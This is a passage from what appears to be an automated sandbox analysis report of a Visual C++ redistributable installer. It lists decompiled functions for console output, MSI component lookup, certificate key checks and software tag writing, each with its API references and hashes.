                                                                          • String ID: @Met$Burn$DownloadTimeout$WiX\Burn$dlutil.cpp
                                                                          • API String ID: 3522763407-3605160450
                                                                          • Opcode ID: 2ac9848d48d140fc86f6e201e4ad42742f72c9e84df25f42076f466e4380a52a
                                                                          • Instruction ID: cf989e8097e4aafc70fe4a2f6419733997d78d9f8f8139b2e2227717391111b9
                                                                          • Opcode Fuzzy Hash: 2ac9848d48d140fc86f6e201e4ad42742f72c9e84df25f42076f466e4380a52a
                                                                          • Instruction Fuzzy Hash: C2513972D00619BBDF129FA4CC41EEFBAB9EF08711F004155FE04E6190EB368A549BA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0004C9BD Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 152fileCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 79%
                                                                          			E0004C9BD(intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				signed char _v15;
				char _v16;
				void _v24;
				short _v28;
				char _v31;
				void _v32;
				long _v36;
				intOrPtr _v40;
				void* _v44;
				signed int _v48;
				signed char* _v52;
				long _v56;
				int _v60;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t78;
				signed int _t80;
				int _t86;
				void* _t92;
				void* _t94;
				long _t97;
				void _t105;
				void* _t112;
				signed int _t115;
				signed int _t117;
				signed char _t122;
				signed char _t127;
				signed int _t128;
				signed char* _t129;
				intOrPtr* _t130;
				signed int _t131;
				void* _t132;

				_t78 =  *0x7a008; // 0xfbf51acb
				_v8 = _t78 ^ _t131;
				_t80 = _a8;
				_t117 = _t80 >> 6;
				_t115 = (_t80 & 0x0000003f) * 0x30;
				_t129 = _a12;
				_v52 = _t129;
				_v48 = _t117;
				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x7b158 + _t117 * 4)) + _t115 + 0x18));
				_v40 = _a16 + _t129;
				_t86 = GetConsoleCP();
				_t130 = _a4;
				_v60 = _t86;
				 *_t130 = 0;
				 *((intOrPtr*)(_t130 + 4)) = 0;
				 *((intOrPtr*)(_t130 + 8)) = 0;
				while(_t129 < _v40) {
					_v28 = 0;
					_v31 =  *_t129;
					_t128 =  *(0x7b158 + _v48 * 4);
					_t122 =  *(_t128 + _t115 + 0x2d);
					if((_t122 & 0x00000004) == 0) {
						_t92 = E00048DB8(_t115, _t128);
						_t128 = 0x8000;
						if(( *(_t92 + ( *_t129 & 0x000000ff) * 2) & 0x00008000) == 0) {
							_push(1);
							_push(_t129);
							goto L8;
						} else {
							if(_t129 >= _v40) {
								_t128 = _v48;
								 *((char*)( *((intOrPtr*)(0x7b158 + _t128 * 4)) + _t115 + 0x2e)) =  *_t129;
								 *( *((intOrPtr*)(0x7b158 + _t128 * 4)) + _t115 + 0x2d) =  *( *((intOrPtr*)(0x7b158 + _t128 * 4)) + _t115 + 0x2d) | 0x00000004;
								 *((intOrPtr*)(_t130 + 4)) =  *((intOrPtr*)(_t130 + 4)) + 1;
							} else {
								_t112 = E000465B6( &_v28, _t129, 2);
								_t132 = _t132 + 0xc;
								if(_t112 != 0xffffffff) {
									_t129 =  &(_t129[1]);
									goto L9;
								}
							}
						}
					} else {
						_t127 = _t122 & 0x000000fb;
						_v16 =  *((intOrPtr*)(_t128 + _t115 + 0x2e));
						_push(2);
						_v15 = _t127;
						 *(_t128 + _t115 + 0x2d) = _t127;
						_push( &_v16);
						L8:
						_push( &_v28);
						_t94 = E000465B6();
						_t132 = _t132 + 0xc;
						if(_t94 != 0xffffffff) {
							L9:
							_t129 =  &(_t129[1]);
							_t97 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
							_v56 = _t97;
							if(_t97 != 0) {
								if(WriteFile(_v44,  &_v24, _t97,  &_v36, 0) == 0) {
									L19:
									 *_t130 = GetLastError();
								} else {
									 *((intOrPtr*)(_t130 + 4)) =  *((intOrPtr*)(_t130 + 8)) - _v52 + _t129;
									if(_v36 >= _v56) {
										if(_v31 != 0xa) {
											goto L16;
										} else {
											_t105 = 0xd;
											_v32 = _t105;
											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
												goto L19;
											} else {
												if(_v36 >= 1) {
													 *((intOrPtr*)(_t130 + 8)) =  *((intOrPtr*)(_t130 + 8)) + 1;
													 *((intOrPtr*)(_t130 + 4)) =  *((intOrPtr*)(_t130 + 4)) + 1;
													goto L16;
												}
											}
										}
									}
								}
							}
						}
					}
					goto L20;
					L16:
				}
				L20:
				return E0003DE36(_t115, _v8 ^ _t131, _t128, _t129, _t130);
			}






































                                                                          0x0004c9c5
                                                                          0x0004c9cc
                                                                          0x0004c9cf
                                                                          0x0004c9d7
                                                                          0x0004c9db
                                                                          0x0004c9e7
                                                                          0x0004c9ea
                                                                          0x0004c9ed
                                                                          0x0004c9f4
                                                                          0x0004c9fc
                                                                          0x0004c9ff
                                                                          0x0004ca05
                                                                          0x0004ca0b
                                                                          0x0004ca10
                                                                          0x0004ca12
                                                                          0x0004ca15
                                                                          0x0004ca1a
                                                                          0x0004ca24
                                                                          0x0004ca2b
                                                                          0x0004ca2e
                                                                          0x0004ca35
                                                                          0x0004ca3c
                                                                          0x0004ca57
                                                                          0x0004ca5f
                                                                          0x0004ca68
                                                                          0x0004ca8e
                                                                          0x0004ca90
                                                                          0x00000000
                                                                          0x0004ca6a
                                                                          0x0004ca6d
                                                                          0x0004cb34
                                                                          0x0004cb40
                                                                          0x0004cb4b
                                                                          0x0004cb50
                                                                          0x0004ca73
                                                                          0x0004ca7a
                                                                          0x0004ca7f
                                                                          0x0004ca85
                                                                          0x0004ca8b
                                                                          0x00000000
                                                                          0x0004ca8b
                                                                          0x0004ca85
                                                                          0x0004ca6d
                                                                          0x0004ca3e
                                                                          0x0004ca42
                                                                          0x0004ca45
                                                                          0x0004ca4b
                                                                          0x0004ca4d
                                                                          0x0004ca50
                                                                          0x0004ca54
                                                                          0x0004ca91
                                                                          0x0004ca94
                                                                          0x0004ca95
                                                                          0x0004ca9a
                                                                          0x0004caa0
                                                                          0x0004caa6
                                                                          0x0004cab5
                                                                          0x0004cabb
                                                                          0x0004cac1
                                                                          0x0004cac6
                                                                          0x0004cae2
                                                                          0x0004cb55
                                                                          0x0004cb5b
                                                                          0x0004cae4
                                                                          0x0004caec
                                                                          0x0004caf5
                                                                          0x0004cafb
                                                                          0x00000000
                                                                          0x0004cafd
                                                                          0x0004caff
                                                                          0x0004cb02
                                                                          0x0004cb1b
                                                                          0x00000000
                                                                          0x0004cb1d
                                                                          0x0004cb21
                                                                          0x0004cb23
                                                                          0x0004cb26
                                                                          0x00000000
                                                                          0x0004cb26
                                                                          0x0004cb21
                                                                          0x0004cb1b
                                                                          0x0004cafb
                                                                          0x0004caf5
                                                                          0x0004cae2
                                                                          0x0004cac6
                                                                          0x0004caa0
                                                                          0x00000000
                                                                          0x0004cb29
                                                                          0x0004cb29
                                                                          0x0004cb5d
                                                                          0x0004cb6f

                                                                          APIs
                                                                          • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,0004D132,?,00000000,?,00000000,00000000), ref: 0004C9FF
                                                                          • __fassign.LIBCMT ref: 0004CA7A
                                                                          • __fassign.LIBCMT ref: 0004CA95
                                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 0004CABB
                                                                          • WriteFile.KERNEL32(?,?,00000000,0004D132,00000000,?,?,?,?,?,?,?,?,?,0004D132,?), ref: 0004CADA
                                                                          • WriteFile.KERNEL32(?,?,00000001,0004D132,00000000,?,?,?,?,?,?,?,?,?,0004D132,?), ref: 0004CB13
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                          • String ID: @Met
                                                                          • API String ID: 1324828854-2381362037
                                                                          • Opcode ID: 1af2a0bf3a44cbe3018b6165db5a018bff79898c225358a7437c2b75c5576026
                                                                          • Instruction ID: 91606681775ccba13f07af6c1a2d972738417b5a3138d4493ea42a4d87e4ae16
                                                                          • Opcode Fuzzy Hash: 1af2a0bf3a44cbe3018b6165db5a018bff79898c225358a7437c2b75c5576026
                                                                          • Instruction Fuzzy Hash: 7251C3B1E01249AFEB50CFA8DC45EEEBBF4EF09300F14412AE555E7291E730A950CBA5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00019DB4 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 147COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 52%
                                                                          			E00019DB4(intOrPtr* _a4, intOrPtr _a8) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				void* _t34;
				intOrPtr _t35;
				void* _t36;
				void* _t43;
				void* _t48;
				void* _t50;
				void* _t53;
				intOrPtr _t58;
				intOrPtr* _t59;
				void* _t61;
				void* _t62;

				_t47 = _a8;
				_t59 = _a4;
				_v12 = 0;
				_v16 = 0;
				_v20 = 0;
				_v8 = 0;
				if(E000171CF(_a8,  *((intOrPtr*)(_t59 + 0x18)),  &_v16, 0) >= 0) {
					if( *((intOrPtr*)(_t59 + 0x14)) == 0) {
						L5:
						_push( &_v8);
						_push( &_v12);
						_push(_v16);
						if(_v20 == 0) {
							_t34 = E00052C2D(_t48);
						} else {
							_push(_v20);
							_t34 = E000526E7(_t48);
						}
						_t61 = _t34;
						_t35 = _v12;
						_t58 = 4;
						if(_t35 != 0xfffffffc) {
							if(_t35 == 0xffffffff || _t35 == 0xfffffff9) {
								_t35 = 2;
								goto L17;
							} else {
								if(_t35 == 2 || _t35 == 3 || _t35 == _t58) {
									goto L18;
								} else {
									_t61 = 0x80070057;
									E0005012F(0x80070057, "Failed to get component path: %d", _t35);
									_t62 = _t62 + 0xc;
									goto L35;
								}
							}
						} else {
							_t35 = _t58;
							L17:
							_v12 = _t35;
							L18:
							_t50 =  *((intOrPtr*)(_t59 + 0x10)) - 1;
							if(_t50 == 0) {
								if(_t35 == 2 || _t35 == 3 || _t35 == _t58) {
									L30:
									_t36 = E000180F6(_t47,  *((intOrPtr*)(_t59 + 4)), _v8, 0);
									L31:
									_t61 = _t36;
									goto L32;
								} else {
									L32:
									if(_t61 >= 0) {
										L36:
										E00012793(_v16);
										E00012793(_v20);
										if(_v8 != 0) {
											E000554EF(_v8);
										}
										return _t61;
									}
									_push("Failed to set variable.");
									L34:
									_push(_t61);
									E0005012F();
									L35:
									_push(_t61);
									E0005061A(2, "MsiComponentSearch failed: ID \'%ls\', HRESULT 0x%x",  *_t59);
									goto L36;
								}
							}
							_t53 = _t50 - 1;
							if(_t53 == 0) {
								asm("cdq");
								_t36 = E00018152(_t47,  *((intOrPtr*)(_t59 + 4)), _t35, _t58, 0);
								goto L31;
							}
							if(_t53 != 1 || _t35 != 2 && _t35 != 3 && _t35 != _t58) {
								goto L32;
							} else {
								_t43 = E0003F878(_v8, 0x5c);
								if(_t43 != 0) {
									 *((short*)(_t43 + 2)) = 0;
								}
								goto L30;
							}
						}
					}
					_t61 = E000171CF(_t47,  *((intOrPtr*)(_t59 + 0x14)),  &_v20, 0);
					if(_t61 >= 0) {
						goto L5;
					}
					_push("Failed to format product code string.");
					goto L34;
				}
				_push("Failed to format component id string.");
				goto L34;
			}


















                                                                          0x00019dbb
                                                                          0x00019dc2
                                                                          0x00019dc6
                                                                          0x00019dc9
                                                                          0x00019dcc
                                                                          0x00019dcf
                                                                          0x00019de3
                                                                          0x00019df3
                                                                          0x00019e14
                                                                          0x00019e1b
                                                                          0x00019e1f
                                                                          0x00019e20
                                                                          0x00019e23
                                                                          0x00019e2f
                                                                          0x00019e25
                                                                          0x00019e25
                                                                          0x00019e28
                                                                          0x00019e28
                                                                          0x00019e34
                                                                          0x00019e36
                                                                          0x00019e3b
                                                                          0x00019e3f
                                                                          0x00019e48
                                                                          0x00019e75
                                                                          0x00000000
                                                                          0x00019e4f
                                                                          0x00019e52
                                                                          0x00000000
                                                                          0x00019e5d
                                                                          0x00019e5e
                                                                          0x00019e69
                                                                          0x00019e6e
                                                                          0x00000000
                                                                          0x00019e6e
                                                                          0x00019e52
                                                                          0x00019e41
                                                                          0x00019e41
                                                                          0x00019e76
                                                                          0x00019e76
                                                                          0x00019e79
                                                                          0x00019e7c
                                                                          0x00019e7f
                                                                          0x00019ec4
                                                                          0x00019ecf
                                                                          0x00019ed8
                                                                          0x00019edd
                                                                          0x00019edd
                                                                          0x00000000
                                                                          0x00019edf
                                                                          0x00019edf
                                                                          0x00019ee1
                                                                          0x00019f02
                                                                          0x00019f05
                                                                          0x00019f0d
                                                                          0x00019f16
                                                                          0x00019f1b
                                                                          0x00019f1b
                                                                          0x00019f28
                                                                          0x00019f28
                                                                          0x00019ee3
                                                                          0x00019ee8
                                                                          0x00019ee8
                                                                          0x00019ee9
                                                                          0x00019ef0
                                                                          0x00019ef0
                                                                          0x00019efa
                                                                          0x00000000
                                                                          0x00019eff
                                                                          0x00019ec4
                                                                          0x00019e81
                                                                          0x00019e84
                                                                          0x00019eb3
                                                                          0x00019eba
                                                                          0x00000000
                                                                          0x00019eba
                                                                          0x00019e89
                                                                          0x00000000
                                                                          0x00019e99
                                                                          0x00019e9e
                                                                          0x00019ea7
                                                                          0x00019eab
                                                                          0x00019eab
                                                                          0x00000000
                                                                          0x00019ea7
                                                                          0x00019e89
                                                                          0x00019e3f
                                                                          0x00019e04
                                                                          0x00019e08
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00019e0a
                                                                          0x00000000
                                                                          0x00019e0a
                                                                          0x00019de5
                                                                          0x00000000

                                                                          APIs
                                                                          • _MREFOpen@16.MSPDB140-MSVCRT ref: 00019DDA
                                                                          • _MREFOpen@16.MSPDB140-MSVCRT ref: 00019DFF
                                                                          Strings
                                                                          • Failed to format component id string., xrefs: 00019DE5
                                                                          • Failed to set variable., xrefs: 00019EE3
                                                                          • Failed to format product code string., xrefs: 00019E0A
                                                                          • Failed to get component path: %d, xrefs: 00019E63
                                                                          • MsiComponentSearch failed: ID '%ls', HRESULT 0x%x, xrefs: 00019EF3
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: Open@16
                                                                          • String ID: Failed to format component id string.$Failed to format product code string.$Failed to get component path: %d$Failed to set variable.$MsiComponentSearch failed: ID '%ls', HRESULT 0x%x
                                                                          • API String ID: 3613110473-1671347822
                                                                          • Opcode ID: 0721e35af5a182678299cff9ad3916e6a3504a350a6348abf4f2400377142c9a
                                                                          • Instruction ID: 2cb3bf1b0f09b2ac9f7a0ca48c61d580a48ad0547e2a6e28367f5b6409767666
                                                                          • Opcode Fuzzy Hash: 0721e35af5a182678299cff9ad3916e6a3504a350a6348abf4f2400377142c9a
                                                                          • Instruction Fuzzy Hash: B041E632900215BACB75DAA8CC62AFFB6E9EF04310F244A26F505E5192D7319ED0D792
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00029080 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 138COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 45%
                                                                          			E00029080(intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				char _v28;
				signed int _v32;
				char _v36;
				char _v40;
				signed int _v44;
				intOrPtr _v48;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t40;
				intOrPtr _t44;
				signed short _t57;
				void* _t64;
				void* _t71;
				void* _t72;
				signed int _t73;
				intOrPtr _t79;
				char* _t80;
				void* _t82;
				signed int _t87;
				void* _t88;

				_t40 =  *0x7a008; // 0xfbf51acb
				_v8 = _t40 ^ _t87;
				_t79 = _a8;
				_t80 =  &_v28;
				_v36 = 0x14;
				asm("stosd");
				_v32 = 0;
				_t72 = 0x80070490;
				_v40 = 0;
				_t73 = 0;
				_v48 = _t79;
				asm("stosd");
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t44 =  *((intOrPtr*)( *((intOrPtr*)(_t79 + 0x10))));
				if( *((intOrPtr*)(_t44 + 0xc)) <= 0) {
					L12:
					_t82 = _t72;
					if(_t72 >= 0) {
						L15:
						_t45 = _v32;
						if(_v32 != 0) {
							E00013999(_t45);
						}
						return E0003DE36(_t72, _v8 ^ _t87, _t79, _t80, _t82);
					}
					_push("Failed to find expected public key in certificate chain.");
					_push(_t72);
					L14:
					E0005012F();
					goto L15;
				}
				_t80 = _a4;
				while(1) {
					_t83 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x10)) + _t73 * 4)) + 4));
					_push( &_v36);
					_push( &_v28);
					_push( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x10)) + _t73 * 4)) + 4)) + 0xc)) + 0x38);
					_push(1);
					_push(0);
					_push(0x8004);
					_push(0);
					if( *0x7a93c() == 0) {
						break;
					}
					_t60 = _v36;
					if( *((intOrPtr*)(_t80 + 0x24)) != _v36) {
						L11:
						_t73 = _v44 + 1;
						_v44 = _t73;
						_t44 =  *((intOrPtr*)( *((intOrPtr*)(_v48 + 0x10))));
						if(_t73 <  *((intOrPtr*)(_t44 + 0xc))) {
							continue;
						}
						goto L12;
					}
					_t64 = E0003F919( *((intOrPtr*)(_t80 + 0x20)),  &_v28, _t60);
					_t88 = _t88 + 0xc;
					if(_t64 != 0) {
						goto L11;
					}
					if( *((intOrPtr*)(_t80 + 0x28)) == _t64) {
						_t72 = 0;
						goto L12;
					}
					_t82 = E00055587(_t73, _t83, 3,  &_v32,  &_v40);
					if(_t82 < 0) {
						_push("Failed to read certificate thumbprint.");
						L20:
						_push(_t82);
						goto L14;
					}
					_t68 = _v40;
					if( *((intOrPtr*)(_t80 + 0x2c)) != _v40) {
						L9:
						_t69 = _v32;
						if(_v32 != 0) {
							E00013999(_t69);
							_v32 = _v32 & 0x00000000;
						}
						goto L11;
					}
					_t71 = E0003F919( *((intOrPtr*)(_t80 + 0x28)), _v32, _t68);
					_t88 = _t88 + 0xc;
					if(_t71 == 0) {
						_t82 = 0;
						goto L15;
					}
					goto L9;
				}
				_t57 = GetLastError();
				_t86 =  <=  ? _t57 : _t57 & 0x0000ffff | 0x80070000;
				_t82 =  >=  ? 0x80004005 :  <=  ? _t57 : _t57 & 0x0000ffff | 0x80070000;
				E000137D3(0x80004005, "cache.cpp", 0x7c4, _t82);
				_push("Failed to get certificate public key identifier.");
				goto L20;
			}


























                                                                          0x00029086
                                                                          0x0002908d
                                                                          0x00029090
                                                                          0x00029098
                                                                          0x0002909b
                                                                          0x000290a2
                                                                          0x000290a5
                                                                          0x000290a8
                                                                          0x000290ad
                                                                          0x000290b0
                                                                          0x000290b2
                                                                          0x000290b5
                                                                          0x000290b6
                                                                          0x000290b9
                                                                          0x000290ba
                                                                          0x000290bb
                                                                          0x000290bf
                                                                          0x000290c4
                                                                          0x0002917d
                                                                          0x0002917d
                                                                          0x00029181
                                                                          0x00029190
                                                                          0x00029190
                                                                          0x00029195
                                                                          0x00029198
                                                                          0x00029198
                                                                          0x000291af
                                                                          0x000291af
                                                                          0x00029183
                                                                          0x00029188
                                                                          0x00029189
                                                                          0x00029189
                                                                          0x00000000
                                                                          0x0002918f
                                                                          0x000290ca
                                                                          0x000290cd
                                                                          0x000290d3
                                                                          0x000290d9
                                                                          0x000290dd
                                                                          0x000290e4
                                                                          0x000290e5
                                                                          0x000290e7
                                                                          0x000290e9
                                                                          0x000290ee
                                                                          0x000290f8
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000290fe
                                                                          0x00029104
                                                                          0x00029165
                                                                          0x0002916b
                                                                          0x0002916c
                                                                          0x00029172
                                                                          0x00029177
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00029177
                                                                          0x0002910e
                                                                          0x00029113
                                                                          0x00029118
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0002911d
                                                                          0x000291be
                                                                          0x00000000
                                                                          0x000291be
                                                                          0x00029133
                                                                          0x00029137
                                                                          0x000291b6
                                                                          0x000291bb
                                                                          0x000291bb
                                                                          0x00000000
                                                                          0x000291bb
                                                                          0x00029139
                                                                          0x0002913f
                                                                          0x00029154
                                                                          0x00029154
                                                                          0x00029159
                                                                          0x0002915c
                                                                          0x00029161
                                                                          0x00029161
                                                                          0x00000000
                                                                          0x00029159
                                                                          0x00029148
                                                                          0x0002914d
                                                                          0x00029152
                                                                          0x000291b2
                                                                          0x00000000
                                                                          0x000291b2
                                                                          0x00000000
                                                                          0x00029152
                                                                          0x000291c2
                                                                          0x000291d3
                                                                          0x000291dd
                                                                          0x000291eb
                                                                          0x000291f0
                                                                          0x00000000

                                                                          APIs
                                                                          • _memcmp.LIBVCRUNTIME ref: 0002910E
                                                                            • Part of subcall function 00055587: GetLastError.KERNEL32(?,?,00029133,?,00000003,00000000,?), ref: 000555A6
                                                                          • _memcmp.LIBVCRUNTIME ref: 00029148
                                                                          • GetLastError.KERNEL32 ref: 000291C2
                                                                          Strings
                                                                          • Failed to get certificate public key identifier., xrefs: 000291F0
                                                                          • Failed to find expected public key in certificate chain., xrefs: 00029183
                                                                          • cache.cpp, xrefs: 000291E6
                                                                          • Failed to read certificate thumbprint., xrefs: 000291B6
                                                                          • @Met, xrefs: 000291C2
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast_memcmp
                                                                          • String ID: @Met$Failed to find expected public key in certificate chain.$Failed to get certificate public key identifier.$Failed to read certificate thumbprint.$cache.cpp
                                                                          • API String ID: 3428363238-519595906
                                                                          • Opcode ID: 6fdbcfe07cfb25af8444e138f84b56acd5f962d9dde94ceb769a33df90526557
                                                                          • Instruction ID: cab7ed83918676314da8491fdbbd0a81b29a57ba566aa5fedf9f08965a8a5304
                                                                          • Opcode Fuzzy Hash: 6fdbcfe07cfb25af8444e138f84b56acd5f962d9dde94ceb769a33df90526557
                                                                          • Instruction Fuzzy Hash: A8417F71E00226AFEB50DBA9D845AEEB7F9AF08714F004129FA05EB241D774ED50CBA4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0001F2DC Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 109stringCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 51%
                                                                          			E0001F2DC(void* __ebx, intOrPtr _a4, void* _a8) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				intOrPtr _t49;
				intOrPtr* _t52;
				char _t54;
				intOrPtr* _t58;
				char _t59;

				_t58 = _a8;
				_t59 = 0;
				_v16 = 0;
				_v8 = 0;
				_v12 = 0;
				_v20 = 0;
				if( *((intOrPtr*)(_t58 + 4)) <= 0) {
					L22:
					return _t59;
				}
				_t54 = 0;
				_a8 = 0;
				while(1) {
					_t52 =  *_t58 + _t54;
					_t59 = E000171CF(_a4,  *((intOrPtr*)(_t52 + 8)),  &_v16, 0);
					if(_t59 < 0) {
						break;
					}
					_t59 = E00012D79(_t54, _v16, L"swidtag",  &_v8);
					if(_t59 < 0) {
						_push("Failed to allocate regid folder path.");
						L15:
						_push(_t59);
						E0005012F();
						L16:
						if(_v12 != 0) {
							E000554EF(_v12);
						}
						if(_v8 != 0) {
							E000554EF(_v8);
						}
						if(_v16 != 0) {
							E000554EF(_v16);
						}
						goto L22;
					}
					_t59 = E00012D79(_t54, _v8,  *_t52,  &_v12);
					if(_t59 < 0) {
						_push("Failed to allocate regid file path.");
						goto L15;
					}
					_t59 = E00014013(_v8, 0);
					if(_t59 < 0) {
						_push(_v8);
						_push("Failed to create regid folder: %ls");
						L11:
						_push(_t59);
						E0005012F();
						goto L16;
					}
					_t59 = E00054C67(_t54, _v12, 0x80,  *(_t52 + 0xc), lstrlenA( *(_t52 + 0xc)), 0);
					if(_t59 < 0) {
						_push(_v12);
						_push("Failed to write tag xml to file: %ls");
						goto L11;
					}
					_t49 = _v20 + 1;
					_t54 = _a8 + 0x10;
					_v20 = _t49;
					_t22 = _t58 + 4; // 0x8680a79
					_push(0);
					_a8 = _t54;
					_pop(0);
					if(_t49 <  *_t22) {
						continue;
					}
					goto L16;
				}
				_push("Failed to format tag folder path.");
				goto L15;
			}












                                                                          0x0001f2e6
                                                                          0x0001f2e9
                                                                          0x0001f2eb
                                                                          0x0001f2ee
                                                                          0x0001f2f1
                                                                          0x0001f2f4
                                                                          0x0001f2fa
                                                                          0x0001f407
                                                                          0x0001f40d
                                                                          0x0001f40d
                                                                          0x0001f300
                                                                          0x0001f302
                                                                          0x0001f306
                                                                          0x0001f309
                                                                          0x0001f31a
                                                                          0x0001f31e
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0001f335
                                                                          0x0001f339
                                                                          0x0001f3c7
                                                                          0x0001f3d3
                                                                          0x0001f3d3
                                                                          0x0001f3d4
                                                                          0x0001f3db
                                                                          0x0001f3e0
                                                                          0x0001f3e5
                                                                          0x0001f3e5
                                                                          0x0001f3ee
                                                                          0x0001f3f3
                                                                          0x0001f3f3
                                                                          0x0001f3fc
                                                                          0x0001f401
                                                                          0x0001f401
                                                                          0x00000000
                                                                          0x0001f3fc
                                                                          0x0001f34d
                                                                          0x0001f351
                                                                          0x0001f3c0
                                                                          0x00000000
                                                                          0x0001f3c0
                                                                          0x0001f35d
                                                                          0x0001f361
                                                                          0x0001f3ad
                                                                          0x0001f3b0
                                                                          0x0001f3b5
                                                                          0x0001f3b5
                                                                          0x0001f3b6
                                                                          0x00000000
                                                                          0x0001f3bb
                                                                          0x0001f37f
                                                                          0x0001f383
                                                                          0x0001f3a3
                                                                          0x0001f3a6
                                                                          0x00000000
                                                                          0x0001f3a6
                                                                          0x0001f38b
                                                                          0x0001f38c
                                                                          0x0001f38f
                                                                          0x0001f392
                                                                          0x0001f395
                                                                          0x0001f397
                                                                          0x0001f39a
                                                                          0x0001f39b
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0001f3a1
                                                                          0x0001f3ce
                                                                          0x00000000

                                                                          APIs
                                                                          • _MREFOpen@16.MSPDB140-MSVCRT ref: 0001F315
                                                                            • Part of subcall function 00014013: CreateDirectoryW.KERNELBASE(0001533D,000153B5,00000000,00000000,?,00029EE4,00000000,00000000,0001533D,00000000,000152B5,00000000,?,?,0001D4AC,0001533D), ref: 00014021
                                                                            • Part of subcall function 00014013: GetLastError.KERNEL32(?,00029EE4,00000000,00000000,0001533D,00000000,000152B5,00000000,?,?,0001D4AC,0001533D,00000000,00000000), ref: 0001402F
                                                                          • lstrlenA.KERNEL32(0005B4F0,00000000,00000094,00000000,00000094,?,?,00020328,swidtag,00000094,?,0005B508,00020328,00000000,?,00000000), ref: 0001F368
                                                                            • Part of subcall function 00054C67: CreateFileW.KERNEL32(0005B4F0,40000000,00000001,00000000,00000002,00000080,00000000,00020328,00000000,?,0001F37F,?,00000080,0005B4F0,00000000), ref: 00054C7F
                                                                            • Part of subcall function 00054C67: GetLastError.KERNEL32(?,0001F37F,?,00000080,0005B4F0,00000000,?,00020328,?,00000094,?,?,?,?,?,00000000), ref: 00054C8C
                                                                          Strings
                                                                          • Failed to allocate regid folder path., xrefs: 0001F3C7
                                                                          • Failed to create regid folder: %ls, xrefs: 0001F3B0
                                                                          • Failed to write tag xml to file: %ls, xrefs: 0001F3A6
                                                                          • Failed to format tag folder path., xrefs: 0001F3CE
                                                                          • swidtag, xrefs: 0001F328
                                                                          • Failed to allocate regid file path., xrefs: 0001F3C0
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
